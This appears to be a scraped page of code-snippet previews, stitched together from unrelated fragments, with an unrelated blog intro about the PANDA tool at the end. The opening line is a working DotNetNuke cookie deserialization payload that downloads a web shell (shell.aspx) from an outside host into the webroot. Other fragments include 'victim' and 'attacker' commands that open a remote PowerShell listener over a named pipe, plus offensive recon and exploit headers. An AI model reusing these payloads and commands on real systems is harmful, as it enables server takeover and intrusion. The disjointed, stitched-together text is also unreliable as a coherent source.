| DNNPersonalization=<profile><item key="name1:key1" type="System.Data.Services.Internal.ExpandedWrapper`2[[DotNetNuke.Common.Utilities.FileSystemUtils], [System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"><ExpandedWrapperOfFileSystemUtilsObjectDataProvider xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><ExpandedElement/><ProjectedProperty0><MethodName>PullFile</MethodName><MethodParameters><anyType xsi:type="xsd:string">http://ctf.pwntester.com/shell.aspx</anyType><anyType xsi:type="xsd:string">C:\inetpub\wwwroot\dotnetnuke\shell.aspx</anyType></MethodParameters><ObjectInstance xsi:type="FileSystemUtils"></ObjectInstance></ProjectedProperty0></ExpandedWrapperOfFileSystemUtilsObjectDataProvider></item></profile>;language=en-us |
| #include <stdlib.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <pthread.h> | |
| #include <sys/mman.h> | |
| #include <IOKit/IOKitLib.h> | |
| #include <CoreFoundation/CFPropertyList.h> | |
| const char* kMyDriversIOKitClassName = "io_oooverflow_IPwnKit"; |
| # Author: Matt Graeber, SpecterOps | |
| ls C:\* -Recurse -Include '*.exe', '*.dll' -ErrorAction SilentlyContinue | % { | |
| try { | |
| $Assembly = [Reflection.Assembly]::ReflectionOnlyLoadFrom($_.FullName) | |
| if ($Assembly.GetReferencedAssemblies().Name -contains 'System.Management.Automation') { | |
| $_.FullName | |
| } | |
| } catch {} | |
| } |
| // ==UserScript== | |
| // @name Reddit Hide Promoted Links (New Design) | |
| // @namespace http://github.com/rohenaz | |
| // @version 0.1 | |
| // @description remove promoted posts and advertisements | |
| // @author Satchmo | |
| // @match https://www.reddit.com/* | |
| // @grant none | |
| // ==/UserScript== |
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |
| # PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/ | |
| # tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c | |
| # the most up-to-date version of PowerView will always be in the dev branch of PowerSploit: | |
| # https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1 | |
| # New function naming schema: | |
| # Verbs: | |
| # Get : retrieve full raw data sets | |
| # Find : ‘find’ specific data entries in a data set |
| #!/bin/bash | |
| # macOS Sierra TFTP Server Creator | |
| # Author Mertcan GÖKGÖZ - 07.05.2017 15:00 (GMT +3) | |
| # | |
| # Requirements | |
| # - Macos Sierra 10.12.4 and later | |
| # - 'homebrew' package manager | |
| # - brew install dialog | |
| # | |
| # How to use |
| . | |
| ├── matree | |
| ├── swift | |
| │ ├── 00503_0_254.242_2013mar02 | |
| │ ├── 00546_0_ensbdasa-09aug2013 | |
| │ ├── 00553_0_ensbdpix3-09aug2013 | |
| │ ├── 00554_0_ensbdpix4-09aug2013 | |
| │ ├── 00555_0_ensbdrtr1-2013aug09 | |
| │ ├── 00557_0_ENSBDVPN1-02AUG2013 | |
| │ ├── 00558_0_ENSBDVPN2-02AUG2013 |
| # Command to run on the victim | |
| # This will establish a PowerShell listener over the "pwnme" named pipe | |
| remote /S "powershell.exe" pwnme | |
| # Commands to run on an attacker system - if remote.exe is desired on the client (versus developing your own SMB pipe client) | |
| runas /netonly /user:[Domain|Hostname\Username] "cmd" | |
| remote /C [Hostname\IP] "pwnme" |
Being someone who tries to play a lot with Windows memory, I really wanted to play with PANDA, but I was slightly scared because I'd never touched qemu before - all my experience had been with VirtualBox and VMware.
My goal was to install PANDA into a (relatively) clean install of Debian 8 'Jessie', capture a recording and successfully run a PANDA plugin.
